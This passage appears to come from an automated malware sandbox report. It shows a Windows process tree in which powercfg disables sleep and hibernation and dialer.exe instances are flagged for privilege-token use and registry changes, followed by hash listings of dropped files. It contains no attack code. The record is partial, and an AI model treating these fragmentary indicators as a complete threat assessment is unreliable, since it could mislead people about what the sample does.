C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1744
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2976 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1316
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2856 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1532
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:1936
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:2284
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:4472
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
15.9MB
MD5d3c16cede9b6e4ee304a0184328d313d
SHA1bd82838a3cc343956ecce4d5051b510dd941de11
SHA256e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c
SHA512284c38ba1a8ce4120120eb89a8e17bcbb6c3d18874c189d65812e767a111883813163ab614d5de802b5ee2fe774143a84017399508c24ac061029828d3046f6b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
Filesize
3KB
MD58d346e67fe454926c9be4324ada55a7f
SHA1b75f48371401e1a22f475ea5ebc212168cb3b6d6
SHA256b0d81bc6e9ed18f4b19f3057d3c1b6ef65eaec17c7e27031a67c3220ee487c21
SHA512e719a64ec49c0859d8611446a8ce9376d61ce9302bc78faa0f22dc6b775d3c0eb6aa5c293f8df8bf409861ae19f2ffa9e80e3a2cea6312f60aa70d3ae3e4181a